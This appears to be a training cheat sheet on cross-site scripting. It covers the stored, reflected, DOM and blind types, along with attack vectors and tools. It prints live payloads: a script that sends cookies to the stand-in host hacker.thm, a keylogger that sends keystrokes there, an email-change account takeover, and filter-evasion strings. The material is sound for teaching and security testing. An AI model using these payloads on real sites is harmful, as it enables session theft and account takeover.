XSS - Cross-Site Scripting

Injection attack where a malicious payload can be injected into a web page and potentially result in an attacker getting user, staff, or other sensitive data.

XSS attacks can be used for a wide variety of attacks, resulting in anything from stealing cookies to executing arbitrary code on the server.

Confirm XSS:

<script>alert('XSS');</script>

Payload examples can be found at:

• Payload Box - XSS
• PayloadsAllTheThings
• SecLists
• HackTricks

Example Payloads

<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>

<script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>

<script>user.changeEmail('attacker@hacker.thm');</script>

XSS Types

Stored XSS

XSS where a payload is injected into a webpage and stored at the server level, resulting in that malicious code's presentation to other users of the site.

Attack Vectors:

• Comments on a blog
• User profile information
• Website Listings

Reflected XSS

XSS where the payload is reflected only on the page instance itself. Attackers must send a link to the altered page to a victim, as it is not stored at the server level.

Attack Vectors:

• Parameters in the URL Query String
• URL File Path

DOM XSS

DOM-based XSS depends on JavaScript code executing locally and not server-side. This allows an attacker to exploit specific JS functions and, like reflected XSS, send a link with the malicious code injected.

Attack Vectors:

• eval()

Blind XSS

Blind XSS is where malicious code is presented to other users (as in stored XSS), however you are unable to see it. An HTML callback is incorporated into the payload.

Filter Evasion

><script>alert(1);</script>

</textarea><script>alert(1);</script>

<sscriptcript>alert(1);</sscriptcript>

/images/cat.jpg" onload="alert(1);

Tools

XSS is mostly and best done manually, but some tools exist with varying degrees of success:

• xsshunter
• xsssniper
• xssstealer
• garud
• 0d1n